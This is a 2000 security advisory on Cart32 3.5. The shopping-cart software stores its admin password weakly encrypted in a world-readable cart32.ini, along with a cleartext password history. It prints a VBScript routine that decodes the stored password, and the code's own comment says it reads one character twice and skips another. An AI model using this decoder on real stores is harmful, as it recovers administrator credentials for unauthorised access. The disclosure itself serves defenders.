Reported November 8, 2000 by Colin Hart
VERSIONS AFFECTED
DESCRIPTION
Cart 32 version 3.5 creates a file cart32.ini which
contains, in encrypted form, the administration password. The
encryption scheme used is very weak and can be broken. In the debug
section of the file, you may also find a password history in clear
text. The cart32.ini file resides in a world-readable directory by
default.
DEMONSTRATION
As requested by the vendor, Colin Hart
did not provide the encryption algorithm used by Cart32. However,
Xato Network Security, in their release of additional Cart32 problems, also
released this VBScript, which demonstrates how the password could be
decrypted:
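Function Cart32Decode(sPass)
    ' sPass is the encoded password string read from cart32.ini.
    ' Each output character is the input character at a fixed position
    ' minus a fixed offset; no key is involved.
    ' As published, position 2 is read twice and position 16 is never read.
    Cart32Decode = Chr(Asc(Mid(sPass, 8)) - 12) & _
        Chr(Asc(Mid(sPass, 5)) - 8) & _
        Chr(Asc(Mid(sPass, 3)) - 16) & _
        Chr(Asc(Mid(sPass, 15)) - 15) & _
        Chr(Asc(Mid(sPass, 9)) - 9) & _
        Chr(Asc(Mid(sPass, 1)) - 12) & _
        Chr(Asc(Mid(sPass, 4)) - 3) & _
        Chr(Asc(Mid(sPass, 11)) - 5) & _
        Chr(Asc(Mid(sPass, 13)) - 11) & _
        Chr(Asc(Mid(sPass, 6)) - 5) & _
        Chr(Asc(Mid(sPass, 2)) - 1) & _
        Chr(Asc(Mid(sPass, 2)) - 1) & _
        Chr(Asc(Mid(sPass, 14)) - 13) & _
        Chr(Asc(Mid(sPass, 12)) - 10) & _
        Chr(Asc(Mid(sPass, 10)) - 6) & _
        Chr(Asc(Mid(sPass, 7)) - 8)
End Function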
VENDOR RESPONSE
The Cart 32 team at McMurtrey/Whitaker
& Associates has addressed these issues in the latest version 3.5a and
has recommended that users read the knowledge base articles provided on
their web site. http://www.cart32.com
CREDIT
Discovered by Colin Hart